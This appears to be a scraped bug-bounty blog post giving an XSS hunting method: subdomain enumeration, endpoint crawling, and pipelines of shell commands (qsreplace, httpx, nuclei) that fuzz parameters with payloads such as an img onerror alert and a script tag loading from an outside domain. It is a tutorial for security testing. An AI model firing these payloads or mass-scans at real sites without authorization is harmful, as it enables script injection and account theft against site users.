.png)
1 year ago
36 BOOK THIS SPACE FOR AD
ARTICLE AD
- collect a sub domain (AssetFinder — SubFinder — Amass — Find-domain — Google Dorking)
- find the number of sub-domains which are active ( `httprobe (Tomnomnom) — HTTPX ) >> cat subdomains.txt | httprobe | tee -a host.txt
- use your payloads :`` <script/src=//NJ.₨></script>
- your report if not acceptd
- cat host.txt | crawler | tee -a endpoint.txt & cat host.txt | waybackurl | tee -a endpoint.txt
- After finding all the 50 Lakh endpoint I started to fuzz all the parameters to find xss vulnerability with the help of the tool qsreplace. The command used was:
cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt
After executing the command now, I had to check the number of parameters have been reflecting our payload into a plain text weather or not, So I created a tool named FREQ which is also available in my GitHub repo. So, the tool sends multiple requests to the check whether the response containing the payload return us with the affected URLs. The command used to perform this attack was:cat xss_fuzz.txt | freq | tee -a possible_xss.txt### second method
cleanP : github.com/raoufmaklouf/c…
injectP: github.com/raoufmaklouf/i…
XSS.yaml : gist.githubusercontent.com/raoufmaklouf/7…
- single target: `gau target.com | cleanP | injectP ‘T%22rSpGeUMo%3E7N’ | httpx -ms ‘T”rSpGeUMo>7N’ | nuclei -t XSS.yaml -o xss.txt
&
- cat AllEndPoint.txt | cleanP | injectP ‘T%22rSpGeUMo%3E7N’ | httpx -ms ‘T”rSpGeUMo>7N’ | nuclei -t XSS.yaml -o xss.txt
### third method
irst of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and
then subdomain brute-forcing with [knockpy](https://github.com/guelfoweb/knock),
then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS and then I used [gf](https://github.com/tomnomnom/gf) to get possible XSS parameters.
after sorting the URLs I used [KXSS](https://github.com/Emoe/kxss)
And [Dalfox](https://github.com/hahwul/dalfox). Bad luck I got nothing.
[ ] Tips
# If XSS is not executed through the UI, you can try to insert it through the API
# It can then fire on the UI. Many filters are not present like this
business logic , register vulnerability , bypass 2fa , authentication ,IDOR
https://github.com/Az0x7/vulnerability-Checklist
linkedin , Twitter
Bengali (Bangladesh) · 
English (United States) ·